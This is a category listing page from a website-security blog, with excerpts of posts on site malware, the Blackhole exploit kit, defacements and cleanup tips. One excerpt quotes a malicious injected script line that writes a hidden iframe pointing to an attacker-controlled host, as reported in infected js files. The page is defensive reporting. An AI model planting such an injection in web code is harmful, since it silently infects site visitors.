Category: Drupal Security

VisitorTracker Malware – way beyond just JavaScript files

Over the past couple of weeks, we’ve seen a fairly new malware show up in sites. It doesn’t appear to be specific to any one type of cms or website which would point to some type of ‘other’ vulnerability such as a compromised FTP, cPanel or other unknown issue. We haven’t been able to track…
Read more


September 26, 2015 1

Drupal Patches XSS Vulnerability in Spam Module

Drupal released an update that patches a moderately critical cross-site scripting vulnerability in its Mollom content and spam moderation module.


September 17, 2014 0

Website Malware spreading beyond just the basics, infected .jpg files

Our team has seen numerous sites over the past few weeks that have what seems to be a more sophisticated attack. It appears that malware is no longer limited to just your standard files such as asp, aspx, htm/html, javascript, php, etc. They have started inserting code in the headers of jpg files. We’ve seen…
Read more


August 29, 2013 0

Infected with the Blackhole Exploit kit?

Is your site infected with the Blackhole exploit kit? The Blackhole exploit kit is still a major threat to website owners. You usually don’t know you have it unless you visit your site and get a virus warning from your anti-virus software. It doesn’t matter if your site is static HTML, custom PHP, wordpress, joomla,…
Read more


August 14, 2013 0

Site hacked by Solt6n and or MeHdi God?

Recently, thousands of sites were compromised by Solt6n (Details available at: http://www.zone-h.org/archive/notifier=solt6n). It appears that this has been ongoing for months. We don’t currently have details of how the sites were compromised but it appears that it may just be due to weak credentials on sites. If you aren’t technical and you need immediate assistance,…
Read more


February 28, 2013 0

Massive Iframe injection “nighttrend.cgi?8” from 78.157.192.72

It appears that in the last 24 hours, many people are reporting that sites are getting infected with iframes. One user reported that the following: document.write(‘ < iframe width="10" height="10" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://byiegfs[.]ddns[.]info/nighttrend.cgi?8">< / iframe> ‘); had been inserted into all their js files on their server. if you resolve the domain, you end up with…
Read more


December 11, 2012 1

Quick tips for removing malware

If you don’t have a clean back-up of your website, removing malware from your website will require detail to attention, effort and time. Depending on the size of your site, or the number of sites on your server, it could take you several hours to several days to find and remove everything from your site.…
Read more


August 13, 2012 0

Help! I’ve been hacked, what do I do!?!?

Being hacked is no fun for anyone, below is just a quick list of what you should do if you find your site has been compromised – it is by no means a end all list of EVERYTHING that should be done, but it’s a good starting point for most: Make a copy of your…
Read more


August 13, 2012 0